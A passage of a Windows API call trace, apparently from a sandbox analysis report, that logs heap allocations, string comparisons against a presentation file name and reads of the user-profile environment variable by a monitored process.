lpString1="Ax_c.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x_c.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_c.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0215.240] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0215.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ax_c.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x_c.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_c.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0215.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.241] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0215.242] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0215.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0215.242] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0215.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0215.242] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854bf0 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0215.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.244] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.244] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0215.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854c68 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0215.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0215.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.247] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0215.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0215.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0215.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0215.248] HeapFree 